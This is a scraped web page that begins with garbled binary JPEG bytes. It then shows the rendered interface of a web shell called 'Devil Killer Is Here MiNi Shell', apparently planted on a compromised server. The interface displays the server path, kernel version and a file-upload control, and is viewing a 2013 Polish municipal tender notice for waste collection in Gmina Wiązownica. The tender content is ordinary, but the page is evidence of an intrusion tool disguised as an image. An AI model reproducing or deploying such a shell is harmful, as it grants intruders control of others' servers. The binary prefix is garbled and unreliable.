JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130612/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130612/108375-N-2013.html

<p class="kh_header"><b>Wiązownica: ODBIÓR I ZAGOSPODAROWANIE STAŁYCH ODPADÓW KOMUNALNYCH Z TERENU GMINY  WIĄZOWNICA</b><br>
<b>Numer ogłoszenia: 108375 - 2013; data zamieszczenia: 12.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Wiązownica , Wiązownica 208, 37-522 Wiązownica, woj. podkarpackie, tel. 016 622-36-31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wiazownica.regiony.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ODBIÓR I ZAGOSPODAROWANIE STAŁYCH ODPADÓW KOMUNALNYCH Z TERENU GMINY  WIĄZOWNICA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest systematyczny odbiór, transport oraz zagospodarowanie odpadów komunalnych z nieruchomości położonych na terenie  Gminy Wiązownica, zamieszkanych przez mieszkańców gminy w sposób zapewniający osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenie masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania zgodny z przepisami:
-Ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach (Dz.U. z 2012 r. poz. 391 ze zm.),
-Uchwałą Nr XXVIII/541/12 Sejmiku Województwa Podkarpackiego z dnia 21 grudnia 2012 r. w sprawie zmiany Uchwały Nr XXIV/410/12 Sejmiku Województwa Podkarpackiego z dnia 27 sierpnia 2012r. w sprawie wykonania Planu Gospodarki Odpadami dla Województwa Podkarpackiego 
-Uchwałą Nr XXV/199/2012 Rady Gminy Wiązownica z dnia  21 grudnia 2012 r. w sprawie regulaminu utrzymania czystości i porządku na terenie Gminy Wiązownica, 
-Uchwała Nr XXV/204/2012 Rady Gminy Wiązownica z dnia 21 grudnia 2012 r. w sprawie szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości na terenie Gminy Wiązownica i zagospodarowania tych odpadów.
-Rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013 r., poz. 122), 
I. ZAKRES USŁUG OBEJMUJE:
Odbiór odpadów komunalnych z nieruchomości na których zamieszkują mieszkańcy  Gminy Wiązownica obejmuje w szczególności:
1.Odbiór i zagospodarowanie odpadów stałych pochodzących z gospodarstw domowych. 
2.Odbiór odpadów segregowanych w tym odpadów ulegających biodegradacji. 
3.Odbiór przedmiotów wielkogabarytowych, sprzętu elektrycznego i elektronicznego, zużytych opony, odpadów budowlanych i rozbiórkowych oraz zimnego popiołu. 
4.Dostarczanie do gospodarstw domowych worków do selektywnej zbiórki odpadów:
- koloru białego na szkło bezbarwne - 120 l,
	- koloru zielonego na szkło kolorowe - 120l,
	- koloru niebieskiego na papier tekturę i opakowania wielomateriałowe - 120 l, 
	- koloru żółtego na tworzywa sztuczne - 120 l, 
	- koloru czerwonego na metale - 120 l, 
	- koloru brązowego na odpady ulegające biodegradacji i odpadów zielonych - 120 l, 
	- koloru szarego na odpady budowlane i zimny popiół - 120 l,
 - koloru czarnego na odpady zmieszane - 120 l.
5. Odbiór niebezpiecznych odpadów komunalnych tj. rozpuszczalniki, kwasy, alkalia,  lampy fluoroscencyjne, oleje tłuszcze, farby, tusze, baterie i akumulatory.
6.  Odbiorem i zagospodarowaniem odpadów nie będą objęte  budynki  użyteczności publicznej, zakłady usługowo - produkcyjne, cmentarze itp.
II. ODBIÓR ODPADÓW Z NIERUCHOMOŚCI NA KTÓRYCH ZAMIESZKUJĄ MIESZKAŃCY
Na terenie gminy Wiązownica obowiązywać będzie system mieszany (pojemnikowy i workowy) zbiórki zmieszanych odpadów komunalnych oraz system workowy na odpady segregowane.
Odpady komunalne segregowane i niesegregowane powinny być zbierane w systemie indywidualnym u źródła w pojemnikach lub workach foliowych  do tego celu przeznaczonych o odpowiedniej wytrzymałości zapewniającej bezpieczny z punktu widzenia technicznego i sanitarnego transport.	Wykonawca jest zobowiązany dotrzeć do osób wytwarzających odpady lub do miejsc ich gromadzenia i zebrać wszystkie odpady zgromadzone w pojemnikach lub workach.
Odbiór odpadów  od mieszkańców gminy  prowadzony będzie według harmonogramu opracowanego  przez Wykonawcę wyłonionego w drodze przetargu  i uzgodnionego z Zamawiającym z częstotliwością jeden raz w miesiącu.  Powyższy harmonogram Wykonawca przekaże Zamawiającemu w terminie 14 dni od podpisania Umowy.
Wykonawca jest zobowiązany do odbioru odpadów komunalnych w terminach wynikających z  przyjętego  harmonogramu odbioru, niezależnie od warunków atmosferycznych, pojazdami przystosowanymi do odbioru poszczególnych frakcji odpadów oraz w sposób wykluczający mieszanie odpadów segregowanych. 
W sytuacjach nadzwyczajnych (jak np. nieprzejezdność lub zamkniecie drogi), gdy nie jest możliwa realizacja usługi zgodnie z umową, sposób i termin odbioru odpadów będzie każdorazowo uzgadniany pomiędzy Zamawiającym i Wykonawcą i może  polegać na wyznaczeniu zastępczych miejsc gromadzenia odpadów przez właścicieli nieruchomości, oraz innych terminów ich odbioru. W takich przypadkach Wykonawcy nie przysługuje dodatkowe wynagrodzenie.Wykonawca zobowiązany jest do odbierania odpadów w sposób zapewniający utrzymanie odpowiedniego stanu sanitarnego, w szczególności zapobiegania wysypywaniu się odpadów z pojemników i worków podczas dokonywania odbioru.
III. ODBIÓR I ZAGOSPODAROWANIE ODPADÓW NIESEGREGOWANYCH POCHODZĄCYCH Z GOSPODARSTW  DOMOWYCH 
Zmieszane odpady komunalne gromadzone będą w pojemnikach metalowych lub PCV o poj. 110 - 120 l, bądź też w workach foliowych w kolorze czarnym o poj. również 120 l. Dopuszcza się zbieranie odpadów komunalnych zmieszanych w workach, w sytuacji gdy ilość wytworzonych w danym gospodarstwie odpadów zmieszanych przekracza pojemność pojemnika przeznaczonego na ten rodzaj odpadów lub gdy nieruchomość zamieszkuje jedna osoba. Jeżeli w toku realizacji zamówienia nastąpi uszkodzenie lub zniszczenie pojemnika wynikłe z winy Wykonawcy, jego naprawienie i doprowadzenie do stanu poprzedniego należy do Wykonawcy. 
Wykonawca winien zapewnić kontakt telefoniczny co najmniej w godzinach 700 - 1500 celem nadzorowania przez Zamawiającego odbierania odpadów. 
Częstotliwość odbioru  odpadów zmieszanych - 1 raz w miesiącu.
IV. ODBIERANIE ODPADÓW SEGREGOWANYCH W TYM ODPADÓW ULEGAJĄCYCH BIODEGRADACJI 
a) Selektywnie zbierane odpady komunalne, 
Selektywna zbiórka odpadów komunalnych na terenie gminy Wiązownica będzie się odbywa  w systemie workowym. Wykonawca zobowiązany jest do odbioru wszystkich odpadów zmieszanych oraz selektywnie zebranych. W przypadku stwierdzenia niewłaściwej segregacji Wykonawca przyjmuje te odpady jako zmieszane. Przed zakwalifikowaniem odpadów selektywnych do zmieszanych w wypadku niedopełnienia przez właściciela nieruchomości obowiązku w zakresie selektywnego zbierania odpadów komunalnych, Wykonawca sporządza na tę okoliczność dokumentację np. oświadczenie, dokumentację fotograficzną, zeznanie świadka i przekazuje Zamawiającemu. Uchylanie się od obowiązku zgłaszania Zamawiającemu informacji dotyczącej zaistniałych nieprawidłowości w sposobie segregacji odpadów będzie stanowić naruszenie postanowień umowy. 
Wprowadza się następujące rodzaje worków:
- koloru białego na szkło bezbarwne, 
- koloru zielonego na szkło kolorowe, 
- koloru niebieskiego na papier tekturę i opakowania wielomateriałowe, 
- koloru żółtego na tworzywa sztuczne, 
- koloru czerwonego na metale, 
- koloru brązowego na odpady ulegające biodegradacji i odpadów zielonych,
- koloru szarego na odpady budowlane i zimny popiół,
- koloru czarnego na odpady niesegregowane (zmieszane).
Komplet worków dla każdego właściciela nieruchomości, do pierwszego odbioru selektywnie zebranych odpadów komunalnych Wykonawca zobowiązany jest przekazać w odpowiedniej ilości  do  Urzędu Gminy Wiązownica, który przekaże ich mieszkańcom. Przy każdorazowym odbiorze odpadów selektywnie zbieranych Wykonawca wyposaży właścicieli nieruchomości, od których odebrano ww. odpady w worki, w takiej samej ilości i rodzaju jakie zostały odebrane. Wykonawca  zobowiązany jest w cenie oferty uwzględnić również cenę  worków do selektywnej zbiórki odpadów.
Częstotliwość odbioru  odpadów zmieszanych - 1 raz w miesiącu.
b) Odpady ulegające biodegradacji i odpady zielone 
Odbiór odpadów ulegających biodegradacji na terenie zabudowy jednorodzinnej będzie się odbywać w systemie workowym (worek w kolorze brązowym 120 l)  
Częstotliwość wywozu worków do odbioru odpadów ulegających biodegradacji : 1 raz  w miesiącu
V. ODBIERANIE PRZEDMIOTÓW WIELKOGABARYTOWYCH, SPRZĘTU ELEKTRYCZNEGO I ELEKTRONICZNEGO, ZUŻYTYCH OPONY, ODPADÓW BUDOWLANYCH I ROZBIÓRKOWYCH ORAZ ZIMNEGO POPIOŁU
a) Odpady wielkogabarytowe,  opony,  zużyty sprzęt elektryczny i elektroniczny, 
Odbiór odpadów wielkogabarytowych i zużytego sprzętu elektrycznego i elektronicznego odbywać się będzie bezpośrednio sprzed posesji właścicieli nieruchomości, na których zamieszkują mieszkańcy u źródła
Częstotliwość odbioru odpadów wielkogabarytowych, zużyte opony i zużytego sprzętu elektrycznego i elektronicznego - 1 raz w ciągu obowiązywania umowy. 
b) Odpady budowlane, rozbiórkowe oraz zimny popiół 
Odbiór odpadów budowlanych odbywać się będzie w oparciu o indywidualne umowy cywilno-prawne zawierane pomiędzy podmiotami wykonującymi prace remontowo-budowlane i właścicielami nieruchomości lub między właścicielami, a uprawnionymi do odbioru odpadów przedsiębiorcami.  
Natomiast drobne odpady budowlane i zimny popiół odbierane będą w worku w kolorze szarym - częstotliwość -1 raz w ciągu obowiązywania umowy.
VI.WYMAGANIA DOTYCZĄCE TRANSPORTU ODPADÓW KOMUNALNYCH.
Wykonawca zobowiązany jest  przez cały okres obowiązywania umowy dysponować pojazdami w niezbędnej ilości do prawidłowej realizacji przedmiotu umowy, przystosowanymi do odbioru poszczególnych typów odpadów, w sposób wykluczający mieszania się odpadów, w szczególności winien dysponować pojazdami specjalistycznymi przystosowanymi do odbioru zmieszanych odpadów komunalnych, odpadów zebranych selektywnie oraz pozostałych odpadów określonych w opisie przedmiotu zamówienia.
Zamawiający nie dopuszcza możliwości odbioru odpadów komunalnych wspólnie z innymi  odpadami pochodzącymi od właścicieli nieruchomości niezamieszkałych oraz innych nieruchomości  np. obiekty użyteczności publicznej itp.
Wykonawca zobowiązany jest do przekazania transportowanych odpadów do instalacji przetwarzania odpadów komunalnych przewidzianej do obsługi Regionu Północnego zgodnie z Planem Gospodarki Odpadami dla Województwa Podkarpackiego na przyjmowanie zmieszanych odpadów komunalnych, odpadów z pielęgnacji terenów zielonych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania.  Przekazanie odpadów należy udokumentować zamawiającemu w okresach miesięcznych. Kartę przekazania odpadów  należy przedłożyć zamawiającemu w formie kserokopii potwierdzonej za zgodność z oryginałem.
Wykonawca będzie przekazywał raz w miesiącu raport systemu GPS , który należy zamontować w pojeździe, dokumentujący przebieg pracy pojazdu.
VII.  SPOSÓB ZAGOSPODAROWANIA I EWIDENCJI ODPADÓW
Wykonawca odbierający odpady komunalne od właścicieli nieruchomości zobowiązany jest do:
a)przekazywania odebranych od właścicieli nieruchomości zmieszanych odpadów komunalnych, odpadów zielonych  oraz pozostałości z sortowania odpadów komunalnych  do instalacji przetwarzania odpadów komunalnych  przewidzianych do obsługi Regionu Północnego w Wojewódzkim Planie Gospodarowania Odpadami dla Województwa Podkarpackiego, 
b)przekazywania odebranych od właścicieli nieruchomości selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania odpadów, zgodnie z hierarchią postępowania z odpadami  - ustawa  z dnia 14 grudnia 2012 r. o odpadach ( Dz.U. z 2013 r. poz.21 ), 
c)prowadzenia ewidencji przekazanych odpadów zgodnie z obowiązującymi przepisami oraz  przedkładania ich Zamawiającemu, 
d)Wykonawca ma obowiązek zagospodarować odebrane odpady komunalne w sposób zapewniający osiągnięcie określonych w rozporządzeniu Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia   i  odzysku  innymi metodami niektórych frakcji odpadów komunalnych  (Dz.U. z 2012 r., poz. 645) poziomów recyklingu, przygotowania  do ponownego użycia i odzysku następujących frakcji odpadów: papier, metale, tworzywa sztuczne i szkło, 
e)W celu osiągnięcia poziomów recyklingu, przygotowania do ponownego użycia i odzysku wskazanych frakcji odpadów, Wykonawca obowiązany jest do maksymalnego ułatwienia mieszkańcom nieruchomości pozbywania się odpadów papieru i tektury, tworzyw sztucznych, szkła, metali  powstających na terenie nieruchomości zamieszkałych min. poprzez odbieranie w/w odpadów zebranych w sposób selektywny u źródła. 
f)Wykonawca ponosi całkowitą odpowiedzialność za prawidłowe gospodarowanie odebranymi odpadami zgodnie  z przepisami obowiązującymi w tym zakresie. Dotyczy to ewentualnego przeładunku odpadów, ich transportu, spraw formalno prawnych związanych   z odbieraniem i dostarczeniem odpadów uprawnionemu przedsiębiorcy prowadzącemu działalność w zakresie odzysku lub unieszkodliwiania odpadów komunalnych. 
g)Wykonawca jest zobowiązany do sporządzania kwartalnych sprawozdań i przekazywania ich Zamawiającemu w terminie do końca miesiąca następującego po kwartale, którego dotyczy , zgodnie z ustawą o utrzymaniu czystości i porządku       w gminach. (Dz. U. z 2012 r. poz. 391 i 951) oraz wykonywanie  innych obowiązków wynikających z aktualnie obowiązujących ustaw i rozporządzeń w zakresie gospodarowania odpadami.
VIII. POZOSTAŁE WYMAGANIA FORMALNE ORAZ  INNE WYMAGANIA:
Wykonawca zobowiązany jest  w dniu podpisania umowy oraz przez cały okres , tj. do dnia 31.12.2013 r. spełniać następujące wymagania:
a) posiadać wpis do rejestru działalności regulowanej, o której mowa w art. 9b i 9c ustawy z dnia 13   września 1996 r. o utrzymaniu czystości i porządku w gminach, prowadzonego przez Wójta Gminy Wiązownica, w zakresie objętym przedmiotem zamówienia,
b) zezwolenie na transport odpadów objętych przedmiotem zamówienia,
c) posiadać zawartą umowę z regionalną instalacją do przetwarzania odpadów komunalnych  bądź zastępczymi instalacjami przewidzianymi do obsługi Regionu Północnego zgodnie z Planem Gospodarki Odpadami dla Województwa Podkarpackiego na przyjmowanie zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania,
d) wykonawca zobowiązany jest do posiadania przez cały okres obowiązywania umowy polisy  ubezpieczenia odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej. 
e) wykonawca zobowiązany jest do niezwłocznego zawiadomienia Zamawiającego o okolicznościach uniemożliwiających prawidłową realizację usługi,
f) wykonawca wyznaczy koordynatora, z którym Zamawiający będzie  się kontaktował bezpośrednio w sprawach dotyczących realizacji przedmiotu umowy - w dni powszednie  w godz. 7.30 - 15.30.
g) wykonawca ponosi odpowiedzialność za wszelkie szkody powstałe w wyniku realizacji umowy na zasadach określonych w Kodeksie Cywilnym.
h)bazą magazynowo-transportową usytuowaną w gminie Wiązownica lub w odległości nie większej niż 50 km od granicy gminy Wiązownica na terenie, do którego posiada lub będzie posiadał tytuł prawny; 
i)teren bazy magazynowo-transportowej winien być zabezpieczony w sposób uniemożliwiający wstęp osobom trzecim; 
j)miejsce do parkowania pojazdów winno być zabezpieczone przed emisją zanieczyszczeń do gruntu; 
k)baza ta musi być wyposażona w urządzenia do gromadzenia selektywnie zebranych odpadów komunalnych przed transportem do miejsc przetwarzania,

IX. INFORMACJE  PRZEKAZANA PRZEZ ZAMAWIAJĄCEGO DO SPORZĄDZANIU OFERTY PRZETARGOWEJ:
1. W celu sporządzenia oferty zamawiający  podaje szacunkową ilość odpadów wytworzonych na terenie gminy Wiązownica przez mieszkańców, wynikającą z  przekazanych sprawozdań za rok 2012 r.  - 400 Mg.
2. Ilość gospodarstw domowych i osób zamieszkujących w gospodarstwach domowych

l.p.	miejscowość
	ogólna liczba gospodarstw	ogólna liczba osób
zamieszkałych	liczba gospodarstw  i osób oddających odpady zmieszane	liczba gospodarstw  i osób oddających odpady segregow.
				liczba gospodarstw	liczba osób	liczba gospod.	liczba osób
1.	Manasterz	154	678	2	2	152	676
2.	Nielepkowice	83	370	0	0	83	370
3.	Wiązownica	427	1765	8	14	419	1751
4.	Szówsko	735	3015	30	72	705	2943
5.	Piwoda	235	1098	3	6	232	1092
6.	Radawa	95	364	1	1	94	363
7.	Mołodycz	123	568	1	1	122	567
8.	Cetula	106	499	0	0	106	499
9.	Zapałów	282	1210	3	5	279	1205
10.	Ryszkowa W.	171	724	0	0	171	724
11.	Surmaczówka	33	169	0	0	33	169
12	Wólka Zapał.	16	77	1	4	15	73
         RAZEM	2460	10 537	49	 105	   2411	1     10 432

1.	Szacunkowa ilość wytwarzanych odpadów: 400 Mg w okresie obowiązywania umowy.
Podana ilość odbioru odpadów stanowi wielkość orientacyjną, ilości te zostały podane w celu sporządzenia oferty. Faktyczne ilości odpadów mogą się różnić z podanymi przez Zamawiającego.             
2. Z tytułu  zwiększenia ilości wywożonych odpadów Zamawiający nie będzie ponosił dodatkowych kosztów..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.31.00-7, 90.51.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest  wnieść wadium   w wysokości  5 000 zł.   (słownie: pięć tysięcy złotych).
 2. Wykonawca może wnieść wadium  w jednej lub kilku  formach w art. 45 ust. 2 ustawy Pzp, tj.:      1) w pieniądzu;      2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - 
         kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;       3) w gwarancjach bankowych;
     4) gwarancjach ubezpieczeniowych;
     5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt. 2 ustawy    
         z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 
         Nr 42, poz. 275 oraz z 2007 r. z e zmianami).
3. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4. Wadium w pieniądzu należy wnieść  przelewem na konto Zamawiającego w BS Jarosław    
    o/Wiązownica, numer konta 56 9096 1014 2002 1400 0202 0001    
5. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje 
    termin uznania kwoty na rachunku zamawiającego. 
6. W przypadku wniesienia wadium  formie innej niż w pieniądzu - oryginał dokumentu   
    potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert 
    w  siedzibie Zamawiającego - Urząd Gminy Wiązownica, w kasie Urzędu pok. nr 44 II p. 
    a  kserokopię dokumentu poświadczoną za zgodność z oryginałem należy dołączyć do oferty.
7. W przypadku składania oferty wspólnej, wadium wniesione przez jednego ze wspólników uważa 
    się za wniesione prawidłowo.
8. Brak wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie  
    Wykonawcy na podstawie art. 24 ust. 2 pkt. 2
9. Zwrotu  i zatrzymania złożonego wadium przetargowego  zamawiający dokona zgodnie 
    z przepisami art. 46 ust. 1-5  ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca przedłoży:  
1)	wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości prowadzonego przez Wójta Gminy Wiązownica,
2) zezwolenie na transport odpadów stanowiących przedmiot zamówienia, 
Ocena spełniania warunku zostanie dokonana na podstawie załączonego do oferty: 
a) oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu - art. 22 ust.1 
b) dokumentów przedłożonych na potwierdzenie uprawnień do prowadzenia powyższej  działalności,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli w okresie ostatnich 3 lat przed upływem  terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  wykonali i prawidłowo ukończyli co najmniej 1 usługę 
odpowiadającą  swoim rodzajem  przedmiotowi zamówienia, tj. odbiór i zagospodarowanie odpadów komunalnych przez okres min. 1 roku o łącznej masie min. 600 Mg lub wartości co najmniej 200 000 zł brutto. 
Ocena spełniania warunku zostanie dokonana na podstawie załączonego do oferty: 
a) oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu - art. 22 ust.1 
b) wykazu wykonanych zamówień wg. zał. do siwz.
c) dowodów  potwierdzających, że wykazane usługi zostały wykonane w sposób należyty,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie       
      dysponował niezbędnymi do wykonania zamówienia narzędziami i urządzeniami tj;
      co najmniej 5 pojazdami, w tym: 
a)	co najmniej 2 samochodami specjalistycznymi bezpylnymi o minimalnej kubaturze 3 m3 przystosowanymi do odbierania zmieszanych odpadów komunalnych, 
b)	co najmniej 2 samochodami specjalistycznymi bezpylnymi o minimalnej kubaturze 3 m3  przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych, 
c)	co najmniej jednym samochodem skrzyniowym o ładowności minimalnej 3,5 Mg  do odbierania odpadów bez funkcji kompaktującej, 
Ocena spełniania warunku zostanie dokonana na podstawie załączonego do oferty: 
a) oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu - art. 22 ust.1 
b) wykazu posiadanego sprzętu technicznego wg. zał. do siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego  warunku w tym zakresie. 
      Ocena spełniania warunku zostanie dokonana na podstawie załączonego do oferty oświadczenia 
      wykonawcy.</p>
